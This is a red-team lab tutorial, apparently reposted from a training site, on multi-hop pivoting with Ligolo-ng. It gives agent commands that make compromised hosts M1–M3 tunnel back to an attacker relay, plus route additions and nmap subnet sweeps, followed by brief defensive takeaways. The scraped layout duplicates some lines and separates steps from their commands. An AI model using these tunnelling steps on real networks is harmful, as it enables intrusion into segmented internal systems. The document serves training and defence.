Lateral Movement: Multi-Hop Pivoting with Ligolo-ng
Modern networks are no longer flat or openly exposed. Sensitive systems are hidden deep behind layers of segmentation, making direct access nearly impossible. That's where pivoting comes in β a technique attackers use to move laterally through networks after an initial compromise.
This guide walks through a multi-hop pivoting scenario using Ligolo-ng, a powerful tunneling tool that makes lateral movement seamless. Step by step, we demonstrate how an attacker can traverse segmented networks from the first compromised host all the way to a high-value internal target.
This guide walks through a multi-hop pivoting scenario using Ligolo-ng, a powerful tunneling tool that makes lateral movement seamless. Step by step, we demonstrate how an attacker can traverse segmented networks from the first compromised host all the way to a high-value internal target.
What is Pivoting?
Pivoting is a post-exploitation technique used to route traffic through a compromised system to reach other systems within the same network that are not directly accessible from the attackerβs original position. It allows the attacker to move laterally across network segments by using the compromised host as a bridge or proxy.
Scenario Overview
The objective is to establish access to a high-value target machine M3 from the attacker machine, by pivoting through two intermediary dual-homed systems β M1 and M2.
Core Tooling:
- Ligolo-ng β multiplexed TCP tunnels over a single connection
- Nmap / Ping β for validating connectivity
Network Architecture
Attacker Machine (Kali Linux)
192.168.8.2
β reachable β
M1 β First Pivot Host
eth0: 192.168.8.10 (reachable from attacker)
eth1: 192.168.80.10 (internal link to M2)
eth1: 192.168.80.10 (internal link to M2)
β tunnel β
M2 β Second Pivot Host
eth0: 192.168.80.15 (reachable from M1)
eth1: 172.16.25.2 (internal link to M3)
eth1: 172.16.25.2 (internal link to M3)
β tunnel β
M3 β Final Target Server
172.16.25.100
Execution Walkthrough
PHASE 1
Initial Setup β The Attacker's Relay
Attacker Machine
Configure the Ligolo-ng proxy (relay) on the attacker machine. The relay acts as the central server, listening for incoming connections from agent binaries deployed on compromised hosts.
Once confirmed, start the relay server with a self-signed certificate:
The proxy will now listen on port 443 for incoming agent connections.
Install Ligolo-ng: Download both the
First, verify your attacker machine IP address:
proxy and agent binaries from the official GitHub releases page: github.com/nicocha30/ligolo-ng/releases[ATTACKER] Verify IP address
ip a
[ATTACKER] Start Ligolo-ng proxy relay
./proxy -selfcert -laddr 0.0.0.0:443
PHASE 2
First Pivot β Attacker β M1
Attacker β M1
Assuming initial access to M1 has already been achieved, deploy and execute the Ligolo-ng agent on the victim machine.
Check the victim's network interfaces to discover additional subnets:
You will see M1 has an additional interface on **192.168.80.0/24**. Add a route on the attacker machine to reach this subnet through the tunnel:
Validate connectivity to the new subnet:
You should now see live hosts on the **192.168.80.0/24** network β including M2 at **192.168.80.15**.
[M1 VICTIM] Connect agent to attacker relay
./agent -connect 192.168.8.2:443 -ignore-cert
Note:
Once the agent connects, the attacker will see it appear in the Ligolo-ng console. Start the session:
-ignore-cert skips TLS certificate validation since we used a self-signed cert on the proxy.[ATTACKER] Start tunnel session in Ligolo-ng console
session
start
[ATTACKER β Ligolo-ng console] List victim interfaces
ifconfig
[ATTACKER] Add route to M1's internal subnet
sudo ip route add 192.168.80.0/24 dev ligolo
[ATTACKER] Scan the newly reachable subnet
nmap -v -n 192.168.80.0/24 -T4 --unprivileged
PHASE 3
Second Pivot β M1 β M2
M1 β M2
With the first tunnel active and M2 reachable, deploy the Ligolo-ng agent on M2. After gaining access to M2, run the agent:
The attacker will now see a second agent appear in the Ligolo-ng console. Select the M2 session. Check M2's interfaces to find the next internal subnet:
M2 reveals another interface on **172.16.25.0/24**. Add a route to reach this subnet:
Scan the new subnet to confirm M3 is reachable:
[M2 VICTIM] Connect M2 agent to attacker relay
./agent -connect 192.168.8.2:443 -ignore-cert
[ATTACKER β Ligolo-ng console β M2 session]
session
ifconfig
[ATTACKER] Add route to M2's internal subnet
sudo ip route add 172.16.25.0/24 dev ligolo
[ATTACKER] Scan M3's subnet
nmap -v -n 172.16.25.0/24 -T4 --unprivileged
PHASE 4
Final Hop β M2 β M3
M2 β M3 (Target)
Deploy the Ligolo-ng agent on M3 using the pivoted access through M2:
Once M3's agent connects back to the relay, select its session in the Ligolo-ng console and start the tunnel. The attacker now has **direct tunneled access to M3 at 172.16.25.100** β the final high-value target.
[M3 VICTIM] Connect M3 agent to attacker relay
./agent -connect 192.168.8.2:443 -ignore-cert
Success: Three network segments traversed. The attacker machine now has full tunneled access to M3 without ever being directly routable to it.
Full Command Summary
| Step | Where | Command |
|---|---|---|
| 1 | Attacker | ./proxy -selfcert -laddr 0.0.0.0:443 |
| 2 | M1 | ./agent -connect 192.168.8.2:443 -ignore-cert |
| 3 | Attacker | session β start |
| 4 | Attacker | sudo ip route add 192.168.80.0/24 dev ligolo |
| 5 | Attacker | nmap -v -n 192.168.80.0/24 -T4 --unprivileged |
| 6 | M2 | ./agent -connect 192.168.8.2:443 -ignore-cert |
| 7 | Attacker | sudo ip route add 172.16.25.0/24 dev ligolo |
| 8 | Attacker | nmap -v -n 172.16.25.0/24 -T4 --unprivileged |
| 9 | M3 | ./agent -connect 192.168.8.2:443 -ignore-cert |
// Conclusion
This guide demonstrated how Ligolo-ng can be used to effortlessly pivot across multiple layers of a segmented network. The use of multi-hop tunneling highlights the importance of proper network segmentation, egress filtering, and internal visibility for defenders.Whether you're on the offensive or defensive side, understanding lateral movement and pivoting techniques is crucial for maintaining strong network security posture.
Key takeaways:
- Ligolo-ng uses a single outbound connection β difficult to detect compared to traditional proxychains
- Each pivot host needs an agent binary β consider how you'll transfer it
- Defenders should monitor for unusual outbound connections on port 443 to unknown IPs
- Network segmentation alone is not enough β internal traffic monitoring is essential
// References & Credits
- π Original article: CyberWarfare Live β Lateral Movement: A Guide to Multi-Hop Pivoting with Ligolo-ng
- π§ Ligolo-ng GitHub: github.com/nicocha30/ligolo-ng
- π§ Ligolo-ng Releases: github.com/nicocha30/ligolo-ng/releases
- π CyberWarfare Live: cyberwarfare.live β Advanced Cyber Attack & Detection Learning Platform
Tags: pivoting Β· lateral-movement Β· ligolo-ng Β· red-team Β· tunneling Β· network-segmentation
tags: pivoting, - lateral-movement, - ligolo-ng, - tunneling, - red-team, - networking